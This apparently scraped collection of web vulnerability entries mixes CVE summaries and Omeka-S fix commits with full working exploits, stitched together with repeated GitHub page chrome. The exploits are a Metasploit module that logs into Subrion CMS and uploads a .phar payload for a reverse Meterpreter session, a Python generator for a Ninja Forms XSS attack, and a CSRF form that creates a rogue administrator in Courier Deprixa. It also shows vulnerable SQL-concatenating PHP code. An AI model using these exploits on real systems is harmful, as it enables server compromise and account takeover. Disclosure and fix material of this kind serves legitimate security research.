A SQL injection vulnerability exists in Control ID IDSecure 4.7.26.0 and prior, allowing unauthenticated attackers to write PHP files on the server's root directory, resulting in remote code execution.

**Disclosure Policy**

Team82 is committed to privately reporting vulnerabilities to affected vendors in a coordinated, timely manner in order to ensure the safety of the cybersecurity ecosystem worldwide. To engage with the vendor and research community, Team82 invites you to download and share our Coordinated Disclosure Policy. Team82 will adhere to this reporting and disclosure process when we discover vulnerabilities in products and services.

**Public Email & PGP Key**

Team82 has also made its public PGP Key available for the vendor and research community to securely and safely exchange vulnerability and research information with us.

CVE-2023-33367: CVE-2023-33367

File Upload vulnerability in SEMCMS 3.9 allows remote attackers to run arbitrary code via SEMCMS_Upfile.php.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2020-23564: cmstest/semcms.md at main · a1ertx55/cmstest

social-media-skeleton is an uncompleted social media project. A SQL injection vulnerability in the project allows UNION based injections, which indirectly leads to remote code execution. Commit 3cabdd35c3d874608883c9eaf9bf69b2014d25c1 contains a fix for this issue.

SQL injection (SQLi) is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution. This particular SQLi vulnerability allows UNION based injections, which indirectly leads to RCE.

Improper authorization in a web application undermines its security by exposing sensitive functionalities and resources to unauthorized users. This particular authorization vulnerability allows an unauthorized user to access this resource. Improper authorization is a pervasive problem throughout this application.

The affected script takes a value via a POST request and eventually concatenates it in a SQL query. admin/login.php line 4-5

$uemail=$\_POST\["email"\];  
$upass=$\_POST\["password"\];  
This value is parsed as an array which can be manipulated to contain a malicious payload sell\_return.php lines 8-9

$query="select \* from admin where email='$uemail' and password='$upass'";  
$result=mysqli\_query($dbcon,$query);  
Affected URL/Area  
/social-media-skeleton/admin/login.php

Risk Rating  
Risk: HIGH  
Difficulty to Exploit: LOW

report by Michael Blunt (michael@mik.bz)

CVE-2023-39344: Pre-Auth SQLi leading to RCE in Social Media Skeleton v1.0 in fobybus/social-media-skeleton

PHPGurukul Online Security Guards Hiring System v.1.0 is vulnerable to Cross-Site Scripting (XSS).

CVE-2023-39552: XSS_vuln_issue/Online Security Guards Hiring System 1.0.md at main · Trinity-SYT-SECURITY/XSS_vuln_issue

Improper Input Validation in GitHub repository omeka/omeka-s prior to 4.0.3.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

*   Notifications
*   Fork 109

*   Code
*   Issues 53
*   Pull requests 63
*   Actions
*   Projects
*   Wiki
*   Security
*   Insights

**Commit**

Permalink

Browse files

Browse the repository at this point in the history

Escape installation title when displaying

(cherry picked from commit ca84d69)

*   Loading branch information

Showing **3 changed files** with **3 additions** and **3 deletions**.

*   *   *   layout-admin.phtml
    *   *   *   browse.phtml
        *   *   index.phtml

2 changes: 1 addition & 1 deletion application/view/layout/layout-admin.phtml

Expand Up

@@ -37,7 +37,7 @@ $this->trigger('view.layout');

<a href\="#content" class\="skip"\><?php echo $translate('Skip to main content'); ?></a\>

<div class\="flex"\>

<header\>

<div class\="logo"\><a href\="<?php echo $this\->url('admin'); ?>"\><?php echo $this\->setting('installation\_title', 'Omeka S'); ?></a\></div\>

<div class\="logo"\><a href\="<?php echo $this\->url('admin'); ?>"\><?php echo $escape($this\->setting('installation\_title', 'Omeka S')); ?></a\></div\>

<div id\="mobile-nav"\>

<a href\="#" class\="o-icon-menu button"\><span class\="screen-reader-text"\><?php echo $translate('Navigation menu'); ?></span\></a\>

<a href\="#" class\="o-icon-search button"\><span class\="screen-reader-text"\><?php echo $translate('Search site'); ?></span\></a\>

Expand Down

2 changes: 1 addition & 1 deletion application/view/omeka/admin/index/browse.phtml

Expand Up

@@ -6,7 +6,7 @@ echo $this->pageTitle($translate('Admin dashboard'));

  

<div id\="dashboard"\>

<?php echo $this\->partial('common/version-notification'); ?>

<p\><?php echo sprintf($translate('Welcome to the %s admin dashboard!'), $title); ?></p\>

<p\><?php echo sprintf($translate('Welcome to the %s admin dashboard!'), $this\->escapeHtml($title)); ?></p\>

<?php $this\->trigger('view.browse.before'); ?>

<div id\="manage-resources" class\="panel"\>

<h2\><?php echo $translate('Manage resources'); ?></h2\>

Expand Down

2 changes: 1 addition & 1 deletion application/view/omeka/index/index.phtml

Expand Up

@@ -31,5 +31,5 @@ endforeach;

<p\><?php echo sprintf(

$translate('Go to the %1$s to start working with %2$s.'),

$this\->hyperlink($translate('Admin dashboard'), $this\->url('admin')),

$title

$this\->escapeHtml($title)

); ?></p\>

**0 comments on commit 8b72619**

Please sign in to comment.

CVE-2023-4157: Escape installation title when displaying · omeka/omeka-s@8b72619

Unrestricted Upload of File with Dangerous Type in GitHub repository omeka/omeka-s prior to 4.0.3.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

*   Notifications
*   Fork 109

*   Code
*   Issues 53
*   Pull requests 63
*   Actions
*   Projects
*   Wiki
*   Security
*   Insights

**Commit**

Permalink

Browse files

Browse the repository at this point in the history

Validate asset extensions as well as types

Adds a parallel configurable list of allowed asset extensions alongside
the list of allowed types.

(cherry picked from commit 66e1294)

*   Loading branch information

Showing **2 changed files** with **8 additions** and **1 deletion**.

*   *   *   module.config.php
    *   *   AssetAdapter.php

7 changes: 7 additions & 0 deletions application/config/module.config.php

Expand Up

@@ -47,6 +47,13 @@

'image/gif',

'image/webp',

\],

'allowed\_extensions' => \[

'jpeg',

'jpg',

'png',

'gif',

'webp',

\],

\],

'permissions' => \[

'acl\_resources' => \[

Expand Down

2 changes: 1 addition & 1 deletion application/src/Api/Adapter/AssetAdapter.php

Expand Up

@@ -70,7 +70,7 @@ public function hydrate(Request $request, EntityInterface $entity, ErrorStore $e

  

$tempFile\->setSourceName($fileData\['file'\]\['name'\]);

$config = $this\->getServiceLocator()->get('Config');

$validator = new Validator($config\['api\_assets'\]\['allowed\_media\_types'\]);

$validator = new Validator($config\['api\_assets'\]\['allowed\_media\_types'\], $config\['api\_assets'\]\['allowed\_extensions'\]);

if (!$validator\->validate($tempFile, $errorStore)) {

return;

}

Expand Down

**0 comments on commit 2a7fb26**

Please sign in to comment.

CVE-2023-4159: Validate asset extensions as well as types · omeka/omeka-s@2a7fb26

This Metasploit module exploits an authenticated file upload vulnerability in Subrion CMS versions 4.2.1 and lower. The vulnerability is caused by the .htaccess file not preventing the execution of .pht, .phar, and .xhtml files. Files with these extensions are not included in the .htaccess blacklist, hence these files can be uploaded and executed to achieve remote code execution. In this module, a .phar file with a randomized name is uploaded and executed to receive a Meterpreter session on the target, then deletes itself afterwards.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::PhpEXE  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Intelliants Subrion CMS 4.2.1 - Authenticated File Upload Bypass to RCE',        'Description' => %q{          This module exploits an authenticated file upload vulnerability in          Subrion CMS versions 4.2.1 and lower. The vulnerability is caused by          the .htaccess file not preventing the execution of .pht, .phar, and          .xhtml files. Files with these extensions are not included in the          .htaccess blacklist, hence these files can be uploaded and executed          to achieve remote code execution. In this module, a .phar file with          a randomized name is uploaded and executed to receive a Meterpreter          session on the target, then deletes itself afterwards.        },        'License' => MSF_LICENSE,        'Author' => [          'Hexife',             # Original discovery, PoC, and CVE submission          'Fellipe Oliveira',   # ExploitDB author          'Ismail E. Dawoodjee' # Metasploit module author        ],        'References' => [          [ 'EDB', '49876' ],          [ 'CVE', '2018-19422' ],          [ 'URL', 'https://github.com/intelliants/subrion/issues/801' ],          [ 'URL', 'https://github.com/intelliants/subrion/issues/840' ],          [ 'URL', 'https://github.com/advisories/GHSA-73xj-v6gc-g5p5' ]        ],        'Platform' => 'php',        'Arch' => ARCH_PHP,        'Targets' => [          [            'PHP',            {              'Platform' => 'php',              'Arch' => ARCH_PHP,              'Type' => :php,              'DefaultOptions' => {                'PAYLOAD' => 'php/meterpreter/reverse_tcp'              }            }          ]        ],        'Privileged' => false,        'DisclosureDate' => '2018-11-04',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]        }      )    )    register_options(      [        Opt::RPORT(80, true, 'Subrion CMS default port'),        OptString.new('TARGETURI', [ true, 'Base path', '/' ]),        OptString.new('USERNAME', [ true, 'Username to authenticate with', 'admin' ]),        OptString.new('PASSWORD', [ true, 'Password to authenticate with', 'admin' ])      ]    )  end  def check    uri = normalize_uri(target_uri.path, 'panel/') # requires a trailing forward slash    print_status("Checking target web server for a response at: #{full_uri(uri)}")    res = send_request_cgi({      'method' => 'GET',      'uri' => uri    })    unless res      return CheckCode::Unknown('Target did not respond to check request.')    end    unless res.code == 200 && res.body.downcase.include?('subrion')      return CheckCode::Unknown('Target is not running Subrion CMS.')    end    print_good('Target is running Subrion CMS.')    # Powered by <a href="https://subrion.org/" title="Subrion CMS">Subrion CMS v4.2.1</a><br>    print_status('Checking Subrion CMS version...')    version_number = res.body.to_s.scan(/Subrion\sCMS\sv([\d.]+)/).flatten.first    unless version_number      return CheckCode::Detected('Subrion CMS version cannot be determined.')    end    print_good("Target is running Subrion CMS Version #{version_number}.")    if Rex::Version.new(version_number) <= Rex::Version.new('4.2.1')      return CheckCode::Appears(        'However, this version check does not guarantee that the target is vulnerable, ' \        'since a fix for the vulnerability can easily be applied by a web admin.'      )    end    return CheckCode::Safe  end  def login_and_get_csrf_token(username, password)    print_status('Connecting to Subrion Admin Panel login page to obtain CSRF token...')    # Session cookies need to be kept to preserve the CSRF token across multiple requests    uri = normalize_uri(target_uri.path, 'panel/')    res = send_request_cgi({      'method' => 'GET',      'uri' => uri,      'keep_cookies' => true    })    unless res && res.code == 200      fail_with(Failure::Unknown, "#{peer} - Could not access the Subrion Admin Panel page.")    end    # <input type="hidden" name="__st" value="CA0S3w50vz1zRpdgZl98JAMVrimiXI63lKtxAwyi">    %r{name="__st" value="(?<csrf_token>[\w+=/]+)">} =~ res.body    fail_with(Failure::NotFound, "#{peer} - Failed to get CSRF token.") if csrf_token.nil?    print_good("Successfully obtained CSRF token: #{csrf_token}")    print_status(      "Logging in to Subrion Admin Panel at: #{full_uri(uri)} " \      "using credentials #{datastore['USERNAME']}:#{datastore['PASSWORD']}"    )    auth = send_request_cgi({      'method' => 'POST',      'uri' => uri,      'keep_cookies' => true,      'vars_post' => {        '__st' => csrf_token,        'username' => username,        'password' => password      }    })    unless auth && auth.code == 200      fail_with(Failure::NoAccess, "#{peer} - Failed to log in, cannot access the Admin Panel page.")    end    %r{name="__st" value="(?<csrf_token_auth>[\w+=/]+)">} =~ auth.body    unless csrf_token == csrf_token_auth && auth.body.downcase.include?('administrator')      fail_with(Failure::NoAccess, "#{peer} - Failed to log in, invalid credentials.")    end    print_good('Successfully logged in as Administrator.')    return csrf_token  end  def upload_and_execute_payload(csrf_token)    print_status('Preparing payload...')    # set `unlink_self: true` to delete the file after execution    payload_name = "#{Rex::Text.rand_text_alpha_lower(10)}.phar"    php_payload = get_write_exec_payload(unlink_self: true)    data = Rex::MIME::Message.new    data.add_part(Rex::Text.rand_text_alphanumeric(14), nil, nil, 'form-data; name="reqid"')    data.add_part('upload', nil, nil, 'form-data; name="cmd"')    data.add_part('l1_Lw', nil, nil, 'form-data; name="target"')    data.add_part(csrf_token, nil, nil, 'form-data; name="__st"')    data.add_part(      "#{php_payload}\n",      'application/octet-stream',      nil,      "form-data; name=\"upload[]\"; filename=\"#{payload_name}\""    )    data.add_part(Time.now.getutc.to_i.to_s, nil, nil, 'form-data; name="mtime[]"')    print_status('Sending POST data...')    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'panel', 'uploads', 'read.json'),      'keep_cookies' => true,      'ctype' => "multipart/form-data; boundary=#{data.bound}",      'data' => data.to_s    })    unless res && res.code == 200      fail_with(Failure::UnexpectedReply, "#{peer} - Failed to upload PHP payload.")    end    payload_uri = normalize_uri(target_uri.path, 'uploads', payload_name)    print_good("Successfully uploaded payload at: #{full_uri(payload_uri)}")    # This execution request returns nil    print_status("Executing '#{payload_name}'... This file will be deleted after execution.")    send_request_cgi({      'method' => 'GET',      'uri' => payload_uri,      'keep_cookies' => true    })    print_good("Successfully executed payload: #{full_uri(payload_uri)}")  end  def exploit    csrf_token = login_and_get_csrf_token(datastore['USERNAME'], datastore['PASSWORD'])    upload_and_execute_payload(csrf_token)  endend

Intelliants Subrion CMS 4.2.1 Remote Code Execution

WordPress EventON Calendar plugin version 4.4 suffers from an insecure direct object reference vulnerability.

    # Exploit Title: Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Event Access# Date: 03.08.2023# Exploit Author: Miguel Santareno# Vendor Homepage: https://www.myeventon.com/# Version: 4.4# Tested on: Google and Firefox latest version# CVE : CVE-2023-2796# 1. DescriptionThe plugin lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.# 2. Proof of Concept (PoC)Proof of Concept:https://example.com/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=value

WordPress EventON Calendar 4.4 Insecure Direct Object Reference

WordPress Ninja Forms plugin version 3.6.25 suffers from a cross site scripting vulnerability.

# Exploit Title: WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS (Authenticated)# Google Dork: inurl:/wp-content/plugins/ninja-forms/readme.txt# Date: 2023-07-27# Exploit Author: Mehran Seifalinia# Vendor Homepage: https://ninjaforms.com/# Software Link: https://downloads.wordpress.org/plugin/ninja-forms.3.6.25.zip# Version: 3.6.25# Tested on: Windows 10# CVE: CVE-2023-37979from requests import getfrom sys import argvfrom os import getcwdimport webbrowserfrom time import sleep# Values:url = argv[-1]if url[-1] == "/":    url = url.rstrip("/")# ConstantsCVE_NAME = "CVE-2023-37979"VULNERABLE_VERSION = "3.6.25"  # HTML templateHTML_TEMPLATE = f"""<!DOCTYPE html><html><head>  <title>{CVE_NAME}</title>  <style>    body {{      font-family: Arial, sans-serif;      background-color: #f7f7f7;      color: #333;      margin: 0;      padding: 0;    }}    header {{      background-color: #4CAF50;      padding: 10px;      text-align: center;      color: white;      font-size: 24px;    }}    .cool-button {{      background-color: #007bff;      color: white;      padding: 10px 20px;      border: none;      cursor: pointer;      font-size: 16px;      border-radius: 4px;    }}    .cool-button:hover {{      background-color: #0056b3;    }}  </style></head><body>  <header>  Ninja-forms reflected XSS ({CVE_NAME})</br>    Created by Mehran Seifalinia  </header>  <div style="padding: 20px;">    <form action="{url}/wp-admin/admin-ajax.php" method="POST">      <input type="hidden" name="action" value="nf_batch_process" />      <input type="hidden" name="batch_type" value="import_form_template" />      <input type="hidden" name="security" value="e29f2d8dca" />      <input type="hidden" name="extraData[template]" value="formtemplate-contactformd" />      <input type="hidden" name="method_override" value="_respond" />      <input type="hidden" name="data" value="Mehran"}}<img src=Seifalinia onerror=alert(String.fromCharCode(78,105,110,106,97,45,102,111,114,109,115,32,114,101,102,108,101,99,116,101,100,32,88,83,83,10,67,86,69,45,50,48,50,51,45,51,55,57,55,57,10,45,77,101,104,114,97,110,32,83,101,105,102,97,108,105,110,105,97,45))>" />      <input type="submit" class="cool-button" value="Click here to Execute XSS" />    </form>  </div>  <div style="background-color:red;color:white;padding:1%;">After click on the button, If you received a 0 or received an empty page in browser , that means you need to login first.</div>  <footer>  <a href="https://github.com/Mehran-Seifalinia">Github</a>  </br>  <a href="https://www.linkedin.com/in/mehran-seifalinia-63577a1b6/?originalSubdomain=ir">LinkedIn</a  </footer></body></html>"""def exploit():    with open(f"{CVE_NAME}.html", "w") as poc:        poc.write(HTML_TEMPLATE)        print(f"[@] POC Generated at {getcwd()}\{CVE_NAME}.html")        print("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")        sleep(2)        webbrowser.open(f"{getcwd()}\{CVE_NAME}.html")# Check if the vulnerable version is installeddef check_CVE():    try:        response = get(url + "/wp-content/plugins/ninja-forms/readme.txt")        if response.status_code != 200 or not("Ninja Forms" in response.text):            print("[!] Ninja-forms plugin has not installed on this site.")            return False        else:            version = response.text.split("Stable tag:")[1].split("License")[0].split()[0]            main_version = int(version.split(".")[0])            partial_version = int(version.split(".")[1])            final_version = int(version.split(".")[2])            if (main_version < 3) or (main_version == 3 and partial_version < 6) or (main_version == 3 and partial_version == 6 and final_version <= 25):                print(f"[*] Vulnerable Nonja-forms version {version} detected!")                return True            else:                print(f"[!] Nonja-forms version {version} is not vulnerable!")                return False    except Exception as error:        print(f"[!] Error: {error}")        exit()# Check syntax of the scriptdef check_script():    usage = f"""Usage: {argv[0].split("/")[-1].split("/")[-1]} [OPTIONS] [TARGET]    OPTIONS:        --exploit:  Open a browser and execute the vulnerability.    TARGET:        An URL starts with 'http://' or 'https://'Examples:    > {argv[0].split("/")[-1]} https://vulnsite.com    > {argv[0].split("/")[-1]} --exploit https://vulnsite.com"""    try:        if len(argv) < 2 or len(argv) > 3:            print("[!] Syntax error...")            print(usage)            exit()        elif not url.startswith(tuple(["http://", "https://"])):            print("[!] Invalid target...\n\tTarget most starts with 'http://' or 'https://'")            exit()        else:            for arg in argv:                if arg == argv[0]:                    print("[*]Starting the script >>>")                    state = check_CVE()                    if state == False:                        exit()                elif arg.lower() == "--exploit":                    exploit()                elif arg == url:                    continue                else:                    print(f"[!] What the heck is '{arg}' in the command?")    except Exception as error:        print(f"[!] Error: {error}")        exit()if __name__ == "__main__":    check_script()

WordPress Ninja Forms 3.6.25 Cross Site Scripting

COURIER DEPRIXA version 2.5 suffers from a cross site request forgery vulnerability.

====================================================================================================================================| # Title     : COURIER DEPRIXA V2.5 CSRF Vulnerability                                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit)                                            | | # Vendor    : https://www.themeslide.com/courier-deprixa-logistics-worldwide-v2-5/                                               |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code create a new admin .[+] Go to the line 5.[+] Set the target site link Save changes and apply . [+] infected file : /deprixa/settings/addusersadmin/agregar.php[+] save code as poc.html [+]  <h4 class="modal-title" id="myModalLabel"><i class="fa fa-user-plus"></i> New Administrator</h4>                          </div>                          <div class="modal-body">                                                      <form action="https://127.0.0.1/galaxyexpressuaecom/deprixa/settings/addusersadmin/agregar.php"  class="form-horizontal" method="post">                              <div class="form-group " id="gnombrepa">                              <label for="off_name" class="col-sm-2 control-label">Name</label>                              <div class="col-sm-10">                                <input type="text" class="form-control off_name" name="name_parson"  placeholder="Name Administrator ">                              </div>                              </div>                              <div class="form-group" id="gapellido">                              <label for="email" class="col-sm-2 control-label">Email </label>                              <div class="col-sm-5">                                <input type="text" class="form-control email" name="email"   placeholder="Email ">                              </div>                              <div class="col-sm-5">                                <input class="form-control phone" name="phone" placeholder="Phone">                                                                    </div>                              </div>                              <div class="form-group" id="gemail">                              <label for="office" class="col-sm-2 control-label">Office</label>                              <div class="col-sm-5">                                <input type="text" class="form-control office" name="office"  placeholder="Office ">                              </div>                              <div class="col-sm-5">                              <select type="text" class="form-control role" name="role" >                                <option value="Administrator">Administrator</option>                                                    </select>                              </div>                              </div>                              <div class="form-group " id="gnombre">                              <label for="off_name" class="col-sm-2 control-label">User</label>                              <div class="col-sm-10">                                <input type="text" class="form-control off_name" name="name"  placeholder="User">                              </div>                              </div>                              <div class="form-group" id="gpassword">                              <label for="pwd" class="col-sm-2 control-label">Password</label>                              <div class="col-sm-10">                                <input type="text" class="form-control pwd" name="pwd"  placeholder="Password">                              </div>                              </div>                              <div class="form-group">                              <div class="col-sm-offset-2 col-sm-10">                                <div class="checkbox checkbox-success">                                  <input id="checkbox3" type="checkbox" name="estado" value="1" checked>                                  <label for="checkbox3">                                    Status                                  </label>                                </div>                                <div class="checkbox checkbox-inline" >                                  <input type="checkbox"  name="type" value="a" onclick="return false" checked>                                  <label for="inlineCheckbox3"> Type of user </label>                                </div>                              </div>                              </div>                                                          </div>                            <div class="modal-footer">                              <button type="button" class="btn btn-default" data-dismiss="modal"><i class="fa fa-times"></i>                                Close</button>                              <input class="btn btn-success" name="Submit" type="submit"  id="submit" value="Save">                            </div>                          </form>                                                      </div>                        </div>                      </div>                      <!--fin de moGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Tag

#php